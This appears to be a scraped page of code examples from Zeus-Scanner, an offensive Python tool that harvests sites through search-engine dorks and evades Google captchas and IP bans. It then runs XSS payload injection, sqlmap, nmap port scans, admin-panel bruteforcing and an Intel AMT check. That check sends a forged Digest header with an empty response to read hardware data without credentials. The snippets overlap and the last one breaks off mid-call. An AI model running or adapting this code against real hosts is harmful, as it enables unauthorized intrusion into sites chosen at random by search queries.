Пример #1
0
def main_intel_amt(url, agent=None, proxy=None):
    proxy = proxy_string_to_dict(proxy) or None
    agent = agent or DEFAULT_USER_AGENT
    logger.info(
        set_color(
            "attempting to connect to '{}' and get hardware info...".format(
                url)))
    try:
        json_data = __get_hardware(url, agent=agent, proxy=proxy)
        if json_data is None:
            logger.error(
                set_color("unable to get any information, skipping...",
                          level=40))
            pass
        else:
            print("-" * 40)
            for key in json_data.keys():
                print("{}:".format(str(key).capitalize()))
                for item in json_data[key]:
                    print(" - {}: {}".format(item.capitalize(),
                                             json_data[key][item]))
            print("-" * 40)
    except Exception as e:
        if "Temporary failure in name resolution" in str(e):
            logger.error(
                set_color("failed to connect on '{}', skipping...".format(url),
                          level=40))
            pass
        else:
            logger.exception(
                set_color(
                    "ran into exception '{}', cannot continue...".format(e)))
            fix_log_file()
            request_issue_creation()
Пример #2
0
def __get_auth_headers(target,
                       port=16992,
                       source=None,
                       agent=None,
                       proxy=None):
    if not source or 'WWW-Authenticate' not in source.headers[
            'WWW-Authenticate']:
        logger.info(
            set_color
            or ("header value not established, attempting to get bypass..."))
        source = requests.get("http://{0}:{1}/index.htm".format(target, port),
                              headers={
                                  'connection': 'close',
                                  'user-agent': agent
                              },
                              proxies=proxy)
        return source
    # Get digest and nonce and return the new header
    if 'WWW-Authenticate' in source.headers:
        logger.info(
            set_color(
                "header value established successfully, attempting authentication..."
            ))
        data = re.compile(
            'Digest realm="Digest:(.*)", nonce="(.*)",stale="false",qop="auth"'
        ).search(source.headers['WWW-Authenticate'])
        digest = data.group(1)
        nonce = data.group(2)
        return 'Digest username="******", ' \
               'realm="Digest:{0}", nonce="{1}", ' \
               'uri="/index.htm", response="", qop=auth, ' \
               'nc=00000001, cnonce="deadbeef"'.format(digest, nonce)
    else:
        logger.info(set_color("nothing found, will skip URL..."))
        return None
Пример #3
0
def main(url, show=False, verbose=False):
    logger.info(set_color("loading extensions..."))
    extensions = __load_extensions()
    if verbose:
        logger.debug(
            set_color("loaded a total of {} extensions...".format(
                len(extensions)),
                      level=10))
    logger.info(set_color("attempting to bruteforce admin panel..."))
    check_for_admin_page(url, extensions, show_possibles=show, verbose=verbose)
Пример #4
0
    def __run_attacks(
            url, sqlmap=False, nmap=False, intel=False, xss=False,
            verbose=False, admin=False, given_path=None, auto=False, batch=False
    ):
        """
        run the attacks if any are requested
        """
        __enabled_attacks = {
            "sqlmap": opt.runSqliScan,
            "port": opt.runPortScan,
            "xss": opt.runXssScan,
            "admin": opt.adminPanelFinder,
            "intel": opt.intelCheck
        }

        enabled = set()
        for key in __enabled_attacks.keys():
            if __enabled_attacks[key] is True:
                enabled.add(key)
            if len(enabled) > 1:
                logger.error(set_color(
                    "it appears that you have enabled multiple attack types, "
                    "as of now only 1 attack is supported at a time, choose "
                    "your attack and try again. You can use the -f flag if "
                    "you do not want to complete an entire search again...", level=40
                ))
                shutdown()

        if not batch:
            question = prompt(
                "would you like to process found URL: '{}'".format(url), opts=["y", "N"]
            )
        else:
            question = "y"

        if question.lower().startswith("y"):
            if sqlmap:
                return sqlmap_scan.sqlmap_scan_main(url.strip(), verbose=verbose, opts=__create_arguments(sqlmap=True),
                                                    auto_search=auto, given_path=given_path)
            elif nmap:
                url_ip_address = replace_http(url.strip())
                return nmap_scan.perform_port_scan(url_ip_address, verbose=verbose, opts=__create_arguments(nmap=True))
            elif intel:
                url = get_true_url(url)
                return intel_me.main_intel_amt(url, agent=agent_to_use, proxy=proxy_to_use)
            elif admin:
                main(url, show=opt.showAllConnections, verbose=verbose)
            elif xss:
                main_xss(url, verbose=verbose, proxy=proxy_to_use, agent=agent_to_use, tamper=opt.tamperXssPayloads)
            else:
                pass
        else:
            logger.warning(set_color(
                "skipping '{}'...".format(url), level=30
            ))
Пример #5
0
def main_xss(start_url, verbose=False, proxy=None, agent=None):
    find_xss_script(start_url)
    logger.info(set_color(
        "loading payloads..."
    ))
    payloads = __load_payloads()
    if verbose:
        logger.debug(set_color(
            "a total of {} payloads loaded...".format(len(payloads)), level=10
        ))
    logger.info(set_color(
        "payloads will be written to a temporary file and read from there..."
    ))
    filename = create_urls(start_url, payloads)
    if verbose:
        logger.debug(set_color(
            "loaded URL's have been saved to '{}'...".format(filename), level=10
        ))
    logger.info(set_color(
        "testing for XSS vulnerabilities on host '{}'...".format(start_url)
    ))
    if proxy is not None:
        logger.info(set_color(
            "using proxy '{}'...".format(proxy)
        ))
    success = set()
    with open(filename) as urls:
        for url in urls.readlines():
            url = url.strip()
            result = scan_xss(url, proxy=proxy, agent=agent)
            payload = find_xss_script(url)
            logger.info(set_color(
                "trying payload '{}'...".format(payload)
            ))
            if result:
                success.add(url)
                if verbose:
                    logger.debug(set_color(
                        "payload '{}' appears to be usable...".format(payload), level=10
                    ))
            elif result is "sqli":
                logger.error(set_color(
                    "loaded URL '{}' threw a DBMS error and appears to be SQLi vulnerable, test for SQL injection".format(
                        url
                    ), level=30
                ))
            else:
                if verbose:
                    logger.debug(set_color(
                        "host '{}' does not appear to be vulnerable to XSS attacks with payload '{}'...".format(
                            start_url, payload
                        ), level=10
                    ))
    create_tree(start_url, list(success))
Пример #6
0
def perform_port_scan(url,
                      ports=None,
                      scanner=NmapHook,
                      verbose=False,
                      opts=None,
                      **kwargs):
    """
    main function that will initalize the port scanning
    """
    url = url.strip()
    logger.info(
        set_color(
            "attempting to find IP address for hostname '{}'...".format(url)))
    found_ip_address = socket.gethostbyname(url)
    logger.info(
        set_color("found IP address for given URL -> '{}'...".format(
            found_ip_address)))
    if verbose:
        logger.debug(set_color("checking for nmap on your system...",
                               level=10))
    nmap_exists = find_nmap(verbose=verbose)
    if nmap_exists:
        if verbose:
            logger.debug(
                set_color(
                    "nmap has been found under '{}'...".format(nmap_exists),
                    level=10))
        logger.info(
            set_color("starting port scan on IP address '{}'...".format(
                found_ip_address)))
        try:
            data = scanner(found_ip_address, ports=ports, opts=opts)
            json_data = data._get_all_info()
            data.show_open_ports(json_data)
            file_path = data.send_to_file(json_data)
            logger.info(
                set_color(
                    "port scan completed, all data saved to JSON file under '{}'..."
                    .format(file_path)))
        except KeyError:
            logger.fatal(
                set_color("no port information found for '{}({})'...".format(
                    url, found_ip_address),
                          level=50))
        except Exception as e:
            logger.exception(
                set_color(
                    "ran into exception '{}', cannot continue quitting...".
                    format(e),
                    level=50))
            request_issue_creation()
            pass
    else:
        logger.fatal(
            set_color(
                "nmap was not found on your system, please install it...",
                level=50))
Пример #7
0
    def __run_attacks(url,
                      sqlmap=False,
                      verbose=False,
                      nmap=False,
                      given_path=None,
                      auto=False,
                      batch=False):
        """
        run the attacks if any are requested
        """
        if not batch:
            question = prompt(
                "would you like to process found URL: '{}'".format(url),
                opts=["y", "N"])
        else:
            question = "y"

        if question.lower().startswith("y"):
            if sqlmap:
                return sqlmap_scan.sqlmap_scan_main(
                    url.strip(),
                    verbose=verbose,
                    opts=__create_sqlmap_arguments(),
                    auto_search=auto,
                    given_path=given_path)
            elif nmap:
                url_ip_address = replace_http(url.strip())
                return nmap_scan.perform_port_scan(url_ip_address,
                                                   verbose=verbose)
            else:
                pass
        else:
            logger.warning(set_color("skipping '{}'...".format(url)))
Пример #8
0
    def __run_attacks(
            url, sqlmap=False, nmap=False, intel=False, xss=False,
            verbose=False, admin=False, given_path=None, auto=False, batch=False
    ):
        """
        run the attacks if any are requested
        """
        if not batch:
            question = prompt(
                "would you like to process found URL: '{}'".format(url), opts=["y", "N"]
            )
        else:
            question = "y"

        if question.lower().startswith("y"):
            if sqlmap:
                return sqlmap_scan.sqlmap_scan_main(url.strip(), verbose=verbose, opts=__create_arguments(sqlmap=True),
                                                    auto_search=auto, given_path=given_path)
            elif nmap:
                url_ip_address = replace_http(url.strip())
                return nmap_scan.perform_port_scan(url_ip_address, verbose=verbose, opts=__create_arguments(nmap=True))
            elif intel:
                url = get_true_url(url)
                return intel_me.main_intel_amt(url, agent=agent_to_use, proxy=proxy_to_use)
            elif admin:
                main(url, show=opt.showAllConnections, verbose=verbose)
            elif xss:
                main_xss(url, verbose=verbose, proxy=proxy_to_use, agent=agent_to_use, tamper=opt.tamperXssPayloads)
            else:
                pass
        else:
            logger.warning(set_color(
                "skipping '{}'...".format(url), level=30
            ))
Пример #9
0
 def __choose_attack(choice, attacks):
     while True:
         if int(choice) in range(len(attacks)):
             return int(choice)
         else:
             logger.warning(
                 set_color("{} is not a valid choice...".format(choice)))
Пример #10
0
 def show_open_ports(self, json_data, sep="-" * 30):
     """
     outputs the current scan information
     """
     # have to create a spacer or the output comes out funky..
     spacer_data = {4: " " * 8, 6: " " * 6, 8: " " * 4}
     logger.info(set_color("finding data for IP '{}'...".format(self.ip)))
     json_data = json.loads(json_data)["scan"]
     print(
         "{}\nScanned: {} ({})\tStatus: {}\nProtocol: {}\n".format(
             sep, self.ip,
             json_data[self.ip]["hostnames"][0]["name"],
             json_data[self.ip]["status"]["state"],
             "TCP"
         )
     )
     oports = json_data[self.ip]["tcp"].keys()
     oports.sort()
     for port in oports:
         port_status = json_data[self.ip]["tcp"][port]["state"]
         # output the found port information..
         print(
             "Port: {}\tStatus: {}{}Type: {}".format(
                 port, json_data[self.ip]["tcp"][port]["state"],
                 spacer_data[len(port_status)],
                 json_data[self.ip]["tcp"][port]["name"]
             )
         )
     print("{}".format(sep))
Пример #11
0
def __get_hardware(target, agent=None, proxy=None):
    req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
    if not req.status_code == 200:
        return None
    logger.info(set_color("connected successfully getting hardware info..."))
    tree = html.fromstring(req.content)
    raw = tree.xpath('//td[@class="r1"]/text()')
    bios_functions = tree.xpath('//td[@class="r1"]/table//td/text()')
    data = {
        'platform': {
            'model': raw[0],
            'manufacturer': raw[1],
            'version': raw[2],
            'serial': raw[4],
            'system_id': raw[5]
        },
        'baseboard': {
            'manufacturer': raw[6],
            'name': raw[7],
            'version': raw[8],
            'serial': raw[9],
            'tag': raw[10],
            'replaceable': raw[11]
        },
        'bios': {
            'vendor': raw[12],
            'version': raw[13],
            'date': raw[14],
            'functions': bios_functions
        }
    }
    return json.dumps(data)
Пример #12
0
    def __run_attacks_main():
        which_log_to_use = {
            "dork": URL_LOG_PATH,
            "spider": SPIDER_LOG_PATH
        }

        options = (opt.useRandomDork, opt.dorkToUse, opt.dorkFileToUse)

        to_use = which_log_to_use["dork"] if any(options) is True else which_log_to_use["spider"]

        try:
            urls_to_use = get_latest_log_file(to_use)
        except TypeError:
            urls_to_use = None

        if urls_to_use is None:
            logger.error(set_color(
                "unable to run attacks appears that no file was created for the retrieved data...", level=40
            ))
            shutdown()
        if opt.runSqliScan or opt.runPortScan or opt.intelCheck or opt.adminPanelFinder or opt.runXssScan:
            with open(urls_to_use) as urls:
                for url in urls.readlines():
                    __run_attacks(
                        url.strip(),
                        sqlmap=opt.runSqliScan, nmap=opt.runPortScan, intel=opt.intelCheck, xss=opt.runXssScan,
                        admin=opt.adminPanelFinder, given_path=opt.givenSearchPath,
                        auto=opt.autoStartSqlmap, verbose=opt.runInVerbose, batch=opt.runInBatch
                    )
Пример #13
0
 def __create_arguments(sqlmap=False, nmap=False):
     """
     create the sqlmap arguments (a list of tuples) that will be passed to the API
     """
     logger.info(set_color(
         "creating arguments for {}...".format("sqlmap" if sqlmap else "nmap")
     ))
     retval = []
     splitter = {"sqlmap": ",", "nmap": "|"}
     if sqlmap:
         if opt.sqlmapArguments is not None:
             for line in opt.sqlmapArguments.split(splitter["sqlmap"]):
                 to_use = line.strip().split(" ")
                 option = (to_use[0], to_use[1])
                 if to_use[0] in SQLMAP_API_OPTIONS:
                     retval.append(option)
                 else:
                     logger.warning(set_color(
                         "option '{}' is not recognized by sqlmap API, skipping...".format(option[0]),
                         level=30
                     ))
     elif nmap:
         warning_msg = "option {} is not known by the nmap api, skipping..."
         if opt.nmapArguments is not None:
             for line in opt.nmapArguments.split(splitter["nmap"]):
                 try:
                     data = line.index(" ")
                 except:
                     data = None
                     pass
                 if data is not None:
                     argument = line[0:data]
                     if argument in NMAP_API_OPTS:
                         retval.append(line)
                     else:
                         logger.warning(set_color(
                             warning_msg.format(argument), level=30
                         ))
                 else:
                     if line in NMAP_API_OPTS:
                         retval.append(line)
                     else:
                         logger.warning(set_color(
                             warning_msg.format(line), level=30
                         ))
     return retval
Пример #14
0
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(
            set_color(
                "base64 tamper scripts may increase the possibility of not finding vulnerabilities "
                "in otherwise vulnerable sites...",
                level=30))
    return base64.b64encode(payload)
Пример #15
0
def __get_raw_data(target, page, agent=None, proxy=None):
    logger.info(set_color("getting raw information..."))
    return requests.get("http://{0}:16992/{1}.htm".format(target, page),
                        headers={
                            'connection': 'close',
                            'Authorization': __get_auth_headers(target),
                            'user-agent': agent
                        },
                        proxies=proxy)
Пример #16
0
def __tamper_warnings(script):
    warn_msg = ""
    if script == "hex":
        warn_msg += "hex tamper script may increase risk of false positives..."
    elif script == " base64":
        warn_msg += "base64 tamper script may increase risk of not finding a vulnerability..."
    else:
        pass
    logger.warning(set_color(warn_msg, level=30))
Пример #17
0
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(set_color(
            "hex tamper scripts may increase the risk of false positives...", level=30
        ))
    retval = hex(hash(payload))
    if "-" in str(retval):
        return retval[1:-1]
    else:
        return retval
Пример #18
0
 def __config_search_engine(verbose=False):
     """
     configure the search engine if a one different from google is given
     """
     non_default_msg = "specified to use non-default search engine..."
     if opt.useDDG:
         if verbose:
             logger.debug(set_color(
                 "using DuckDuckGo as the search engine...", level=10
             ))
         logger.info(set_color(
             non_default_msg
         ))
         se = AUTHORIZED_SEARCH_ENGINES["duckduckgo"]
     elif opt.useAOL:
         if verbose:
             logger.debug(set_color(
                 "using AOL as the search engine...", level=10
             ))
         logger.info(set_color(
             non_default_msg
         ))
         se = AUTHORIZED_SEARCH_ENGINES["aol"]
     else:
         if verbose:
             logger.debug(set_color(
                 "using default search engine (Google)...", level=10
             ))
         logger.info(set_color(
             "using default search engine..."
         )) if opt.fileToEnumerate is None else ""
         se = AUTHORIZED_SEARCH_ENGINES["google"]
     return se
Пример #19
0
 def __extract_stacktrace(file_data):
     logger.info(set_color("extracting traceback from log file..."))
     retval, buff_mode, _buffer = [], False, ""
     with open(file_data, "r+") as log:
         for line in log:
             if "Traceback" in line:
                 buff_mode = True
             if line and len(line) < 5:
                 buff_mode = False
                 retval.append(_buffer)
                 _buffer = ""
             if buff_mode:
                 if len(line) > 400:
                     line = line[:400] + "...\n"
                 _buffer += line
     return "".join(retval)
Пример #20
0
 def show_open_ports(self, json_data, sep="-" * 30):
     """
     outputs the current scan information
     """
     logger.info(set_color("finding data for IP '{}'...".format(self.ip)))
     json_data = json.loads(json_data)["scan"]
     print("{}\nScanned: {} ({})\tStatus: {}\nProtocol: {}\n".format(
         sep, self.ip, json_data[self.ip]["hostnames"][0]["name"],
         json_data[self.ip]["status"]["state"], "TCP"))
     oports = json_data[self.ip]["tcp"].keys()
     oports.sort()
     for port in oports:
         print("Port: {}\tStatus: {}\tType: {}".format(
             port, json_data[self.ip]["tcp"][port]["state"],
             json_data[self.ip]["tcp"][port]["name"]))
     print("{}".format(sep))
Пример #21
0
 def __create_sqlmap_arguments():
     """
     create the sqlmap arguments (a list of tuples) that will be passed to the API
     """
     retval = []
     if opt.sqlmapArguments is not None:
         for line in opt.sqlmapArguments.split(","):
             to_use = line.strip().split(" ")
             option = (to_use[0], to_use[1])
             if to_use[0] in SQLMAP_API_OPTIONS:
                 retval.append(option)
             else:
                 logger.warning(
                     set_color(
                         "option '{}' is not recognized by sqlmap API, skipping..."
                         .format(option[0]),
                         level=30))
     return retval
Пример #22
0
def create_urls(url, payload_list, tamper=None):
    tf = tempfile.NamedTemporaryFile(delete=False)
    tf_name = tf.name
    with tf as tmp:
        for i, payload in enumerate(payload_list):
            if tamper:
                try:
                    if i < 1:
                        payload = __tamper_payload(payload, tamper_type=tamper, warning=True)
                    else:
                        payload = __tamper_payload(payload, tamper_type=tamper, warning=False)
                except InvalidTamperProvided:
                    logger.error(set_color(
                        "you provided and invalid tamper script, acceptable tamper scripts are: {}...".format(
                            " | ".join(list_tamper_scripts()), level=40
                        )
                    ))
                    shutdown()
            loaded_url = "{}{}\n".format(url.strip(), payload.strip())
            tmp.write(loaded_url)
    return tf_name
Пример #23
0
 def __config_headers():
     """
     configure the request headers, this will configure user agents and proxies
     """
     if opt.proxyConfig is not None:
         proxy = opt.proxyConfig
     elif opt.proxyFileRand is not None:
         if opt.runInVerbose:
             logger.debug(set_color(
                 "loading random proxy from '{}'...".format(opt.proxyFileRand), level=10
             ))
         with open(opt.proxyFileRand) as proxies:
             possible = proxies.readlines()
             proxy = random.choice(possible).strip()
     else:
         proxy = None
     if opt.usePersonalAgent is not None:
         agent = opt.usePersonalAgent
     elif opt.useRandomAgent:
         agent = grab_random_agent(verbose=opt.runInVerbose)
     else:
         agent = None
     return proxy, agent
Пример #24
0
def request_issue_creation():
    question = prompt(
        "would you like to create an anonymous issue and post it to Zeus's Github",
        opts="yN")
    if question.lower().startswith("n"):
        logger.error(
            set_color(
                "Zeus has experienced an internal error and cannot continue, shutting down...",
                level=40))
        shutdown()

    fix_log_file()
    logger.info(
        set_color(
            "Zeus got an unexpected error and will automatically create an issue for this error, please wait..."
        ))

    def __extract_stacktrace(file_data):
        logger.info(set_color("extracting traceback from log file..."))
        retval, buff_mode, _buffer = [], False, ""
        with open(file_data, "r+") as log:
            for line in log:
                if "Traceback" in line:
                    buff_mode = True
                if line and len(line) < 5:
                    buff_mode = False
                    retval.append(_buffer)
                    _buffer = ""
                if buff_mode:
                    if len(line) > 400:
                        line = line[:400] + "...\n"
                    _buffer += line
        return "".join(retval)

    logger.info(set_color("getting authorization..."))

    encoded = __get_encoded_string()
    n = get_decode_num(encoded)
    token = decode(n, encoded)

    current_log_file = get_latest_log_file(CURRENT_LOG_FILE_PATH)
    stacktrace = __extract_stacktrace(current_log_file)
    issue_title = stacktrace.split("\n")[-2]

    issue_data = {
        "title":
        issue_title,
        "body":
        "Zeus version:\n`{}`\n\n"
        "Error info:\n```{}````\n\n"
        "Running details:\n`{}`\n\n"
        "Commands used:\n`{}`\n\n"
        "Log file info:\n```{}```".format(VERSION, str(stacktrace),
                                          str(platform.platform()),
                                          " ".join(sys.argv),
                                          open(current_log_file).read()),
    }

    _json_data = json.dumps(issue_data)
    if sys.version_info > (3, ):
        _json_data = _json_data.encode("utf-8")

    try:
        req = urllib2.Request(
            url="https://api.github.com/repos/ekultek/zeus-scanner/issues",
            data=_json_data,
            headers={"Authorization": "token {}".format(token)})
        urllib2.urlopen(req, timeout=10).read()
        logger.info(
            set_color(
                "issue has been created successfully with the following name '{}'..."
                .format(issue_title)))
    except Exception as e:
        logger.exception(
            set_color("failed to auto create the issue, got exception '{}', "
                      "you may manually create an issue...".format(e),
                      level=50))
Пример #25
0
def main_xss(start_url, verbose=False, proxy=None, agent=None, tamper=None):
    if tamper:
        logger.info(set_color(
            "tampering payloads with '{}'...".format(tamper)
        ))
    find_xss_script(start_url)
    logger.info(set_color(
        "loading payloads..."
    ))
    payloads = __load_payloads()
    if verbose:
        logger.debug(set_color(
            "a total of {} payloads loaded...".format(len(payloads)), level=10
        ))
    logger.info(set_color(
        "payloads will be written to a temporary file and read from there..."
    ))
    filename = create_urls(start_url, payloads, tamper=tamper)
    logger.info(set_color(
            "loaded URL's have been saved to '{}'...".format(filename)
        ))
    logger.info(set_color(
        "testing for XSS vulnerabilities on host '{}'...".format(start_url)
    ))
    if proxy is not None:
        logger.info(set_color(
            "using proxy '{}'...".format(proxy)
        ))
    success = set()
    with open(filename) as urls:
        for i, url in enumerate(urls.readlines(), start=1):
            url = url.strip()
            result = scan_xss(url, proxy=proxy, agent=agent)
            payload = find_xss_script(url)
            if verbose:
                logger.info(set_color(
                    "trying payload '{}'...".format(payload)
                ))
            if result[0] != "sqli" and result[0] is True:
                success.add(url)
                if verbose:
                    logger.debug(set_color(
                        "payload '{}' appears to be usable...".format(payload), level=10
                    ))
            elif result[0] is "sqli":
                if i <= 1:
                    logger.error(set_color(
                        "loaded URL '{}' threw a DBMS error and appears to be injectable, test for SQL injection, "
                        "backend DBMS appears to be '{}'...".format(
                            url, result[1]
                        ), level=40
                    ))
                else:
                    if verbose:
                        logger.error(set_color(
                            "SQL error discovered...", level=40
                        ))
            else:
                if verbose:
                    logger.debug(set_color(
                        "host '{}' does not appear to be vulnerable to XSS attacks with payload '{}'...".format(
                            start_url, payload
                        ), level=10
                    ))
    if len(success) != 0:
        logger.info(set_color(
            "possible XSS scripts to be used:"
        ))
        create_tree(start_url, list(success))
    else:
        logger.error(set_color(
            "host '{}' does not appear to be vulnerable to XSS attacks...".format(start_url)
        ))
    save = prompt(
        "would you like to keep the URL's saved for further testing", opts="yN"
    )
    if save.lower().startswith("n"):
        os.remove(filename)
Пример #26
0
def check_for_admin_page(url,
                         exts,
                         protocol="http://",
                         show_possibles=False,
                         verbose=False):
    possible_connections, connections = set(), set()
    stripped_url = replace_http(url.strip())
    for ext in exts:
        ext = ext.strip()
        true_url = "{}{}{}".format(protocol, stripped_url, ext)
        if verbose:
            logger.debug(set_color("trying '{}'...".format(true_url),
                                   level=10))
        try:
            urlopen(true_url, timeout=5)
            logger.info(
                set_color(
                    "connected successfully to '{}'...".format(true_url)))
            connections.add(true_url)
        except HTTPError as e:
            data = str(e).split(" ")
            if verbose:
                if "Access Denied" in str(e):
                    logger.warning(
                        set_color(
                            "got access denied, possible control panel found without external access on '{}'..."
                            .format(true_url),
                            level=30))
                    possible_connections.add(true_url)
                else:
                    logger.error(
                        set_color(
                            "failed to connect got error code {}...".format(
                                data[2]),
                            level=40))
        except Exception as e:
            if verbose:
                if "<urlopen error timed out>" or "timeout: timed out" in str(
                        e):
                    logger.warning(
                        set_color(
                            "connection timed out after five seconds "
                            "assuming won't connect and skipping...",
                            level=30))
                else:
                    logger.exception(
                        set_color(
                            "failed to connect with unexpected error '{}'...".
                            format(str(e)),
                            level=50))
                    fix_log_file()
                    request_issue_creation()
    possible_connections, connections = list(possible_connections), list(
        connections)
    data_msg = "found {} possible connections(s) and {} successful connection(s)..."
    logger.info(
        set_color(data_msg.format(len(possible_connections),
                                  len(connections))))
    if len(connections) != 0:
        logger.info(set_color("creating connection tree..."))
        create_tree(url, connections)
    else:
        logger.fatal(
            set_color(
                "did not find any successful connections to {}'s "
                "admin page",
                level=50))
    if show_possibles:
        if len(possible_connections) != 0:
            logger.info(set_color("creating possible connection tree..."))
            create_tree(url, possible_connections)
        else:
            logger.fatal(
                set_color(
                    "did not find any possible connections to {}'s "
                    "admin page",
                    level=50))
Пример #27
0
    if opt.showCurrentVersion:
        print(VERSION_STRING)
        exit(0)

    # run the setup on the program
    setup(verbose=opt.runInVerbose)

    if not opt.hideBanner:
        print(BANNER)

    start_up()

    if opt.showSqlmapArguments:
        logger.info(set_color(
            "there are a total of {} arguments understood by sqlmap API, "
            "they include:".format(len(SQLMAP_API_OPTIONS))
        ))
        print("\n")
        for arg in SQLMAP_API_OPTIONS:
            print(
                "[*] {}".format(arg)
            )
        print("\n")
        logger.info(set_color(
            "for more information about sqlmap arguments, see here '{}'...".format(
                SQLMAP_MAN_PAGE_URL
            )
        ))
        shutdown()

    if opt.showNmapArgs:
Пример #28
0
def get_urls(query,
             url,
             verbose=False,
             warning=True,
             user_agent=None,
             proxy=None,
             **kwargs):
    """
      Bypass Google captchas and Google API by using selenium-webdriver to gather
      the Google URL. This will open a robot controlled browser window and attempt
      to get a URL from Google that will be used for scraping afterwards.

      Only downside to this method is that your IP and user agent will be visible
      until the application pulls the URL.
    """
    if verbose:
        logger.debug(
            set_color("setting up the virtual display to hide the browser...",
                      level=10))
    ff_display = Display(visible=0, size=(800, 600))
    ff_display.start()
    logger.info(
        set_color(
            "firefox browser display will be hidden while it performs the query..."
        ))
    if warning:
        logger.warning(
            set_color(
                "your web browser will be automated in order for Zeus to successfully "
                "bypass captchas and API calls. this is done in order to grab the URL "
                "from the search and parse the results. please give selenium time to "
                "finish it's task...",
                level=30))
    if verbose:
        logger.debug(
            set_color("running selenium-webdriver and launching browser...",
                      level=10))

    if verbose:
        logger.debug(
            set_color(
                "adjusting selenium-webdriver user-agent to '{}'...".format(
                    user_agent),
                level=10))
    if proxy is not None:
        proxy_type = proxy.keys()
        proxy_to_use = Proxy({
            "proxyType": ProxyType.MANUAL,
            "httpProxy": proxy[proxy_type[0]],
            "ftpProxy": proxy[proxy_type[0]],
            "sslProxy": proxy[proxy_type[0]],
            "noProxy": ""
        })
        if verbose:
            logger.debug(
                set_color("setting selenium proxy to '{}'...".format(
                    ''.join(proxy_type) + "://" + ''.join(proxy.values())),
                          level=10))
    else:
        proxy_to_use = None

    profile = webdriver.FirefoxProfile()
    profile.set_preference("general.useragent.override", user_agent)
    browser = webdriver.Firefox(profile, proxy=proxy_to_use)
    logger.info(set_color("browser will open shortly..."))
    browser.get(url)
    if verbose:
        logger.debug(
            set_color(
                "searching search engine for the 'q' element (search button)...",
                level=10))
    search = browser.find_element_by_name('q')
    logger.info(
        set_color("searching '{}' using query '{}'...".format(url, query)))
    search.send_keys(query)
    search.send_keys(Keys.RETURN)  # hit return after you enter search text
    time.sleep(3)
    if verbose:
        logger.debug(set_color("obtaining URL from selenium..."))
    retval = browser.current_url
    ban_url_schema = ["http://ipv6.google.com", "http://ipv4.google.com"]
    if any(u in retval for u in ban_url_schema):  # if you got IP banned
        logger.warning(
            set_color(
                "it appears that Google is attempting to block your IP address, attempting bypass...",
                level=30))
        try:
            retval = bypass_ip_block(retval)
        except IndexError:
            browser.close()  # stop all the random rogue processes
            ff_display.stop()
            logger.warning(
                set_color(
                    "for now the IP ban bypass will only work for queries that have Google's search syntax "
                    "in them. (IE inurl:, incontext:, incontent:)",
                    level=30))
            raise NotImplementedError(
                "bypass for query '{}' is not implemented yet, try again with a different dork, "
                "or change your IP address...".format(query))
    if verbose:
        logger.debug(
            set_color("found current URL from selenium browser '{}'...".format(
                retval),
                      level=10))
    logger.info(set_color("closing the browser and continuing process.."))
    browser.close()
    ff_display.stop()
    return retval
Пример #29
0
def parse_search_results(query,
                         url,
                         verbose=False,
                         dirname="{}/log/url-log",
                         filename="url-log-{}.log",
                         **kwargs):
    """
      Parse a webpage from Google for URL's with a GET(query) parameter
    """
    exclude = "google" or "webcache" or "youtube"

    create_dir(dirname.format(os.getcwd()))
    full_file_path = "{}/{}".format(
        dirname.format(os.getcwd()),
        filename.format(len(os.listdir(dirname.format(os.getcwd()))) + 1))

    def __get_headers():
        try:
            proxy_string = kwargs.get("proxy")
        except:
            pass

        try:
            user_agent = kwargs.get("agent")
        except:
            pass

        return proxy_string, user_agent

    if verbose:
        logger.debug(
            set_color("checking for user-agent and proxy configuration...",
                      level=10))
    proxy_string, user_agent = __get_headers()

    if proxy_string is None:
        proxy_string = None
    else:
        proxy_string = proxy_string_to_dict(proxy_string)
    if user_agent is None:
        user_agent = DEFAULT_USER_AGENT
    else:
        user_agent = user_agent

    user_agent_info = "adjusting user-agent header to {}..."
    if user_agent is not DEFAULT_USER_AGENT:
        user_agent_info = user_agent_info.format(user_agent.strip())
    else:
        user_agent_info = user_agent_info.format(
            "default user agent '{}'".format(DEFAULT_USER_AGENT))

    proxy_string_info = "setting proxy to {}..."
    if proxy_string is not None:
        proxy_string_info = proxy_string_info.format(
            ''.join(proxy_string.keys()) + "://" +
            ''.join(proxy_string.values()))
    else:
        proxy_string_info = "no proxy configuration detected..."

    headers = {"Connection": "close", "user-agent": user_agent}
    logger.info(set_color("attempting to gather query URL..."))
    try:
        query_url = get_urls(query,
                             url,
                             verbose=verbose,
                             user_agent=user_agent,
                             proxy=proxy_string)
    except Exception as e:
        if "WebDriverException" in str(e):
            logger.exception(
                set_color(
                    "it seems that you exited the browser, please allow the browser "
                    "to complete it's run so that Zeus can bypass captchas and API "
                    "calls",
                    level=50))
        else:
            logger.exception(
                set_color(
                    "{} failed to gather the URL from search engine, caught exception '{}' "
                    "exception has been logged to current log file...".format(
                        os.path.basename(__file__),
                        str(e).strip()),
                    level=50))
        shutdown()
    logger.info(
        set_color(
            "URL successfully gathered, searching for GET parameters..."))
    logger.info(set_color(proxy_string_info))
    req = requests.get(query_url, proxies=proxy_string)
    logger.info(set_color(user_agent_info))
    req.headers.update(headers)
    found_urls = URL_REGEX.findall(req.text)
    retval = set()
    for urls in list(found_urls):
        for url in list(urls):
            url = urllib.unquote(url)
            if URL_QUERY_REGEX.match(url) and exclude not in url:
                if type(url) is unicode:
                    url = str(url).encode("utf-8")
                if verbose:
                    logger.debug(
                        set_color("found '{}'...".format(url), level=10))
                retval.add(url.split("&amp;")[0])
    logger.info(
        set_color("found a total of {} URL's with a GET parameter...".format(
            len(retval))))
    if len(retval) != 0:
        logger.info(
            set_color(
                "saving found URL's under '{}'...".format(full_file_path)))
        with open(full_file_path, "a+") as log:
            for url in list(retval):
                log.write(url + "\n")
    else:
        logger.critical(
            set_color(
                "did not find any usable URL's with the given query '{}' "
                "using search engine '{}'...".format(query, url),
                level=50))
        shutdown()
    return list(retval) if len(retval) != 0 else None
Пример #30
0
    # run the setup on the program
    setup(verbose=opt.runInVerbose)

    if not opt.hideBanner:
        print(BANNER)

    start_up()

    if opt.runSqliScan:
        prompt(
            "make sure you have started the sqlmap API, press enter when ready to continue..."
        )

    if opt.showSqlmapArguments:
        logger.info(set_color(
            "there are a total of {} arguments understood by sqlmap API, "
            "they include:".format(len(SQLMAP_API_OPTIONS))
        ))
        print("\n")
        for arg in SQLMAP_API_OPTIONS:
            print(
                "[*] {}".format(arg)
            )
        print("\n")
        logger.info(set_color(
